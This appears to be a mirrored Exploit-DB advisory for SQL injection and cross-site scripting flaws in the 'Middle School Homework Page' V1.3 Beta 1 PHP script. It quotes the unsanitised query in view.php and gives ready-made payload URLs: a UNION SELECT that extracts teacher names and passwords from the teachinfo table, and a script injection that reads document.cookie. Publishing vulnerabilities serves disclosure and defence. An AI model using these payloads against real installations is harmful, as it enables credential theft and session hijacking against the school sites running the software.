Middle School Homework Page V1.3 Beta 1 - Multiple Vulnerabilties

vendor:

Middle School Homework Page

by:

AtT4CKxT3rR0r1ST

8,8

CVSS

HIGH

SQL Injection & Cross Site Scripting

89 (SQL Injection) & 79 (Cross-site Scripting)

CWE

Product Name: Middle School Homework Page

Affected Version From: V1.3 Beta 1

Affected Version To: V1.3 Beta 1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Middle School Homework Page V1.3 Beta 1 – Multiple Vulnerabilties

The vulnerability exists in the view.php file, where the classID parameter is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability by sending a malicious SQL query to the application. The Cross Site Scripting vulnerability exists in the view.php file, where the class parameter is not properly sanitized before being used in an HTML output. An attacker can exploit this vulnerability by sending a malicious script to the application.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being executed. Input validation should also be used to prevent malicious scripts from being executed.

Source

Exploit-DB raw data:

Middle School Homework Page V1.3 Beta 1  - Multiple Vulnerabilties
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://sourceforge.net/projects/mshwpage/
####################################################################

I. Sql Injection

##############
VULNERABILITY
##############
/view.php (line 3-4)
-----------------------------------------------------------------------------

<h2>Homework for <?php get_array("select * from class where
classID=$_REQUEST[class]", 'classDesc') ?> as of <?php $today = date("M j
G:i:s T Y");echo $today; ?>:</h2>
<?php

-----------------------------------------------------------------------------

#########
EXPLOIT
#########
(
localhost/mshwpage/view.php?class=null+and+1=2+union+select+1,concat(name,0x3a,pass)+from+teachinfo


II. Cross Site Scripting

localhost/mshwpage/view.php?class=<script>alert(document.cookie);</script>

####################################################################